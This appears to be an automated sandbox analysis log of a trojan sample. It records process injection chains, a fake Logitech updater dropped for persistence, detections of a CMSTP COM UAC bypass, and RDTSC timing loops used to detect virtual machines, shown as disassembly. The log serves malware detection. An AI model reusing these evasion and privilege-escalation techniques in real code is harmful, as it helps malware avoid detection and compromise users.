                    Source: 16.2.explorer.exe.51cca8a.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 7.2.logioptionsplus_updater.exe.115bf58.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@13/7@3/1
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0076E8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,14_2_0076E8D0
                    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Roaming\LogiOptionsPlusJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\f5a43204a66445ad0e09c0db80eb910b
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeFile created: C:\Users\user\AppData\Local\Temp\9c813d63Jump to behavior
                    Source: Yara matchFile source: 5Z1WFRMTOXRH6X21Z8NU8.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.5Z1WFRMTOXRH6X21Z8NU8.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1730888199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2156540910.000000000394F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeReversingLabs: Detection: 18%
                    Source: explorer.exeString found in binary or memory: " /add
                    Source: explorer.exeString found in binary or memory: " /add /y
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: %%DebenuPDFLibrary-Start
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: SetLicenseKeyErrorPDW32.dll is not found. Please re-install program as administrator.S
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: EActiveX DLL is not found. Please re-install program as administrator.U
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: :The help file is not found. Please re-install the program.
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: document-add-2_large@1x
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: document-text-add-2_large@1x
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: file-image-add-2_large@1x
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeString found in binary or memory: folder-add-2_large@1x
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeFile read: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe "C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe"
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe "C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe"
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: fontsub.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: bitsproxy.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: wer.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: xmllite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: fontsub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: msftedit.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: comsvcs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: cmlua.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: cmutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: fontsub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeStatic file information: File size 11391336 > 1048576
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x5d0a00
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x470e00
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeStatic PE information: More than 200 imports for user32.dll
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: sppcomapi.pdb source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000010.00000002.2933809914.00000000001F2000.00000008.00000001.01000000.00000000.sdmp, cnfpnteryde.1.dr, vkqcbyjdfiw.12.dr
                    Source: Binary string: sppcomapi.pdbGCTL source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000010.00000002.2933809914.00000000001F2000.00000008.00000001.01000000.00000000.sdmp, cnfpnteryde.1.dr, vkqcbyjdfiw.12.dr
                    Source: Binary string: wntdll.pdbUGP source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000046D8000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419589539.000000000425C000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419843860.0000000004700000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933160736.0000000004254000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933372891.0000000004700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3582069173.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581630115.0000000004AD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934043403.0000000004E10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934258001.00000000052C0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000046D8000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419589539.000000000425C000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419843860.0000000004700000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933160736.0000000004254000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933372891.0000000004700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3582069173.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581630115.0000000004AD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934043403.0000000004E10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934258001.00000000052C0000.00000004.00001000.00020000.00000000.sdmp
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeStatic PE information: section name: .didata
                    Source: cnfpnteryde.1.drStatic PE information: section name: dld
                    Source: vkqcbyjdfiw.12.drStatic PE information: section name: dld
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00789FB1 push ecx; ret 14_2_00789FC4
                    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\vkqcbyjdfiwJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\cnfpnterydeJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\cnfpnterydeJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\vkqcbyjdfiwJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Found hidden mapped module (file has been removed from disk)
                    Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\CNFPNTERYDE
                    Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\VKQCBYJDFIW
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeAPI/Special instruction interceptor: Address: 75DA7C44
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeAPI/Special instruction interceptor: Address: 75DA7945
                    Source: C:\Windows\SysWOW64\more.comAPI/Special instruction interceptor: Address: 75DA3B54
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeAPI/Special instruction interceptor: Address: 75DA7C44
                    Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: B0A317
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeAPI/Special instruction interceptor: Address: 75DA7945
                    Tries to detect virtualization through RDTSC time measurements
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeRDTSC instruction interceptor: First address: 75DAF3E1 second address: 75DAF3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeRDTSC instruction interceptor: First address: 75DAF3FD second address: 75DAF3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007F8C64C6CA05h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007F8C64C6CA90h 0x00000031 rdtsc
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeRDTSC instruction interceptor: First address: 75DAF3E1 second address: 75DAF3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeRDTSC instruction interceptor: First address: 75DAF3FD second address: 75DAF3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007F8C64C6CA05h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007F8C64C6CA90h 0x00000031 rdtsc
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_007D8A00 rdtsc 14_2_007D8A00
                    Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vkqcbyjdfiwJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cnfpnterydeJump to dropped file
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe TID: 7312Thread sleep time: -40000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe TID: 8124Thread sleep time: -40000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exe TID: 1720Thread sleep time: -90000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exe TID: 6108Thread sleep time: -180000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exe TID: 764Thread sleep time: -180000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exe TID: 1720Thread sleep time: -30000s >= -30000sJump to behavior
